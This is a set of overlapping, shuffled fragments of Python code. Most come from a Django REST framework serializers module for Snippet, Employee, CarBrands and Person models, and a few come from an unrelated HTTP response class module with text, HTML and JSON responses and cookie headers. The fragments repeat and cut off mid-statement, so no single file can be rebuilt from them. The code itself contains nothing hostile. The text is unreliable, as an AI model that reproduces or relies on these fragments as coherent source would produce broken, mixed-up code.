"update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.title = validate_data.get('title',",
"Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model #",
"Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.title",
"Meta: model = CarBrands fields = '__all__' # creating serializer for list of",
"max_length=100) def create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def",
"class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] # creating a",
"'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly')",
"instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style",
"or mrs def validate_employee_name(self, value): a = \"mr\" if a not in value.lower():",
"update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name = validate_data.get(",
"serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that it should contain",
"validate_employee_name(self, value): a = \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this",
"snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer):",
"an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos =",
"validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer'",
"value class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name =",
"raise serializers.ValidationError( \" contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\",",
"STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model # SnippetSerializer using",
"Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' #",
"= serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new",
"return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet",
"model = Employees fields = [\"employee_name\"] # creating a serialzer for getting details",
"<reponame>anuragrawat19/django_restframework '''writing a serializer for the models so that state of model objects",
"validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language',",
"def create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self,",
"a serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id =",
"a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return",
"return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and",
"instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class",
"= serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new Snippet''' return",
"'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" # creating",
"rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons,",
"snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos)",
"creating serializer for list of all the names of employee in Employees Model",
"'this employee name should contain Mr or Mrs') return value class Meta: model",
"model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100)",
"creating a serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def",
"= CarBrands fields = '__all__' # creating serializer for list of all the",
"# validation for employee_name field that it should contain mr or mrs def",
"def validate_employee_name(self, value): a = \"mr\" if a not in value.lower(): raise serializers.ValidationError(",
"serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields =",
"class Meta: model = Employees fields = [\"employee_name\"] # creating a serialzer for",
"value): if len(value) != 10: raise serializers.ValidationError( \" contact should contain 10 digits",
"fields = \"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class",
"return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return",
"# creating a serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer):",
"# creating serializer for list of all the names of employee in Employees",
"all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model",
"serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value):",
"Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing",
"class Meta: model = CarBrands fields = '__all__' # creating serializer for list",
"a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields",
"serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks #",
"10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact =",
"contact = serializers.CharField(validators=[length]) # validation for employee_name field that it should contain mr",
"a = \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee name",
"that can be easily rendered into JSON,XML''' from rest_framework import serializers from .models",
"serializer for list of all the names of employee in Employees Model class",
"linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def",
"default='friendly') def create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def",
"Mr or Mrs') return value class Meta: model = Employees fields = \"__all__\"",
"serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python')",
"# SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields =",
"return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and",
"class Meta: model = Snippet fields = \"__all__\" # creating a serializer for",
"serializers.ValidationError( 'this employee name should contain Mr or Mrs') return value class Meta:",
"import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer",
"Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] #",
"Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title =",
"serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True)",
"'''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): '''",
"a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return",
"instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields",
"class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model",
"of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10:",
"= serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self,",
"details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) !=",
"instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model =",
"class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' # creating serializer",
"mrs def validate_employee_name(self, value): a = \"mr\" if a not in value.lower(): raise",
"\"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee name should contain",
"field that it should contain mr or mrs def validate_employee_name(self, value): a =",
"LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model # SnippetSerializer",
"instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks",
"Mrs') return value class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer):",
"SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos =",
"instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer):",
"class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos",
"python datatypes that can be easily rendered into JSON,XML''' from rest_framework import serializers",
"a native python datatypes that can be easily rendered into JSON,XML''' from rest_framework",
"Snippet fields = \"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer):",
"code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style",
"the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError(",
"of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields",
"objects can be converted into a native python datatypes that can be easily",
"serializer for the models so that state of model objects can be converted",
"# creating a serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer):",
"def length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact should contain",
"instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language)",
"return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos",
"serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new Snippet'''",
"from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES,",
"instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance #",
"employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that it",
"existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos',",
"class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and",
"= [\"employee_name\"] # creating a serialzer for getting details of all the employees",
"'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'})",
"= serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that it should",
"validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data):",
"employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields =",
"class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" # creating a",
"serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language =",
"Employees fields = [\"employee_name\"] # creating a serialzer for getting details of all",
"or Mrs') return value class Meta: model = Employees fields = \"__all__\" class",
"contain mr or mrs def validate_employee_name(self, value): a = \"mr\" if a not",
"names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees",
"should contain mr or mrs def validate_employee_name(self, value): a = \"mr\" if a",
"and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code)",
"new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an",
"serializers.CharField(validators=[length]) # validation for employee_name field that it should contain mr or mrs",
"# ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class",
"serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons fields =",
"not in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or Mrs')",
"creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands",
"list of all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class",
"that it should contain mr or mrs def validate_employee_name(self, value): a = \"mr\"",
"required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new Snippet''' return",
"validate_data): ''' Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code",
"PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model =",
"''' Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save()",
"Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def",
"= Snippet fields = \"__all__\" # creating a serializer for Roles Model class",
"return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet'''",
"= serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons fields",
"for the models so that state of model objects can be converted into",
"EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet",
"serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES,",
"that state of model objects can be converted into a native python datatypes",
"return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet'''",
"EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] # creating a serialzer",
"model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False,",
"CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' # creating serializer for",
"EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name",
"Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code',",
"Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model",
"instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1))",
"model = Snippet fields = \"__all__\" # creating a serializer for Roles Model",
"mr or mrs def validate_employee_name(self, value): a = \"mr\" if a not in",
"and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update",
"rendered into JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees,",
"employee name should contain Mr or Mrs') return value class Meta: model =",
"value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or Mrs') return value",
"should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50)",
"------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta:",
"instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save()",
"instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language",
"serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data)",
"contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact",
"into a native python datatypes that can be easily rendered into JSON,XML''' from",
"id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False)",
"'''writing a serializer for the models so that state of model objects can",
"of model objects can be converted into a native python datatypes that can",
"= validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using",
"opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons",
"serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return",
"creating a serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id",
"instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer",
"read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that",
"the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model =",
"if a not in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr",
"fields = [\"employee_name\"] # creating a serialzer for getting details of all the",
"= Employees fields = [\"employee_name\"] # creating a serialzer for getting details of",
"state of model objects can be converted into a native python datatypes that",
"employee_name field that it should contain mr or mrs def validate_employee_name(self, value): a",
"''' Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code =",
"Persons, PersonTasks # creating a serializer for Snippet model # SnippetSerializer using 'serializers'",
".models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a",
"can be easily rendered into JSON,XML''' from rest_framework import serializers from .models import",
"only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) #",
"PersonTasks # creating a serializer for Snippet model # SnippetSerializer using 'serializers' class",
"create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance,",
"easily rendered into JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations,",
"\"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model",
"in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"]",
"datatypes that can be easily rendered into JSON,XML''' from rest_framework import serializers from",
"fields = '__all__' # creating serializer for list of all the names of",
"\" contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name",
"def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons fields = \"__all__\"",
"10: raise serializers.ValidationError( \" contact should contain 10 digits only\") designations = serializers.SlugRelatedField(",
"= serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for",
"validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style',",
"EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact should",
"fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self,",
"Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing",
"from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating",
"a serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self,",
"return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance #",
"instance, validate_data): ''' Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title)",
"validate_data): ''' Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name)",
"= serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and",
"instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self,",
"CarBrands fields = '__all__' # creating serializer for list of all the names",
"for list of all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer):",
"JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES,",
"name should contain Mr or Mrs') return value class Meta: model = Employees",
"Meta: model = Employees fields = [\"employee_name\"] # creating a serialzer for getting",
"Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' # creating",
"it should contain mr or mrs def validate_employee_name(self, value): a = \"mr\" if",
"and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance",
"'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def",
"employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError( \"",
"new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an",
"\"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create",
"for employee_name field that it should contain mr or mrs def validate_employee_name(self, value):",
"an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------",
"validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\")",
"return value class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name",
"the models so that state of model objects can be converted into a",
"contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name =",
"= validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language =",
"validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta:",
"def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.title =",
"digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length])",
"Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True,",
"of all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta:",
"existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class",
"!= 10: raise serializers.ValidationError( \" contact should contain 10 digits only\") designations =",
"= serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language",
"allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data)",
"contain Mr or Mrs') return value class Meta: model = Employees fields =",
"instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name',",
"SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" # creating a serializer",
"designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation",
"validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance",
"be easily rendered into JSON,XML''' from rest_framework import serializers from .models import CarBrands,",
"using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" #",
"SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code ="
] |
[
"header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be int",
"self._body = body if body is not None else bytes() @property def status_code(self):",
"str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" )",
"text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code,",
"header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self): raise",
"body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self): raise",
"body if body is not None else bytes() @property def status_code(self): return self._status_code",
"self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value =",
"isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if",
"): if body is not None and not isinstance(body, dict) and \\ not",
"body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def",
"body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self,",
"have 5 attributes. - status_code: default 200 - header: default: [] - body:",
") class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is",
"have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have body",
"len(self._header) @property def body(self): return self._body @property def content_type(self): return self._content_type def add_header(self,",
"hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class",
"if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header is",
"@property def header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def",
"is not None else bytes() @property def status_code(self): return self._status_code @property def header(self):",
"must have 5 attributes. - status_code: default 200 - header: default: [] -",
"\\ if body is not None and len(body) > 0 \\ else None,",
"import _fly_response import json from .cookie import * from .exceptions import * class",
"status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self): raise",
"type.\") self._status_code = status_code self._content_type = content_type self._header = list() self._body = body",
"json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) > 0 \\ else",
"raise NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self): raise NotImplementedError(",
"Response(_Response): \"\"\" All Response subclass must have 5 attributes. - status_code: default 200",
"is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200,",
"isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise",
"NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response",
"def header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self):",
"raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str)",
"if body is not None and len(body) > 0 \\ else None, content_type=\"application/json\"",
"200 - header: default: [] - body: default: bytes() - content_type: default: text/plain",
"is not None and not isinstance(body, str): raise TypeError(\"body must be str type.\")",
"str): raise TypeError(\"content_type must be str type.\") if body is not None and",
"have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have header",
"class Response(_Response): \"\"\" All Response subclass must have 5 attributes. - status_code: default",
"if body is not None else bytes() @property def status_code(self): return self._status_code @property",
"header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def body(self): raise",
"\"\"\" All Response subclass must have 5 attributes. - status_code: default 200 -",
"must have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have",
"\"_Response must have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must",
"super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response):",
") @property def header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property",
"return self._body @property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem =",
"@property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response):",
"header=None, body=None, ): if body is not None and not isinstance(body, dict) and",
"not None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code",
